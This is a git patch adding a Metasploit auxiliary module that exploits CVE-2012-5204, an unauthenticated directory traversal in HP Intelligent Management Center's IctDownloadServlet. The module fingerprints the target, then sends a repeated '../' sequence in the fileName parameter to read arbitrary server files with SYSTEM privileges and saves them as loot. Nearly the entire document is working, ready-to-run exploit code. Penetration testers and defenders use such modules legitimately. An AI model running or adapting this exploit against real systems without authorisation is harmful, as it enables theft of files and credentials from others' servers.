From 0b4eab2499da42c3a1296d652050aa48b30382e2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 3 Apr 2013 00:24:11 +0200 Subject: [PATCH] added module for ZDI-13-053 --- .../hp_imc_ictdownloadservlet_traversal.rb | 100 ++++++++++++++++++ 1 file changed, 100 insertions(+) create mode 100644 modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb new file mode 100644 index 0000000000..7249f7533b --- /dev/null +++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb @@ -0,0 +1,100 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Intelligent Management IctDownloadServlet Directory Traversal', + 'Description' => %q{ + This module exploits a lack of authentication and a directory traversal in HP + Intelligent Management, specifically in the IctDownloadServlet, in order to + retrieve arbitrary files with SYSTEM privileges. This module has been tested + successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-5204' ], + [ 'OSVDB', '91029' ], + [ 'BID', '58676' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-053/' ] + ] + )) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']), + OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']), + # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\ + OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 7]) + ], self.class) + end + + def is_imc? + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"), + 'method' => 'GET' + }) + + if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/ + return true + else + return false + end + end + + def run_host(ip) + + if not is_imc? + vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center") + return + end + + travs = "" + travs << "../" * datastore['DEPTH'] + travs << datastore['FILEPATH'] + + vprint_status("#{rhost}:#{rport} - Sending request...") + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "tmp", "ict", "download"), + 'method' => 'GET', + 'vars_get' => + { + 'fileName' => travs + } + }) + + if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc" + contents = res.body + fname = File.basename(datastore['FILEPATH']) + path = store_loot( + 'hp.imc.faultdownloadservlet', + 'application/octet-stream', + ip, + contents, + fname + ) + print_good("#{rhost}:#{rport} - File saved in: #{path}") + else + vprint_error("#{rhost}:#{rport} - Failed to retrieve file") + return + end + end +end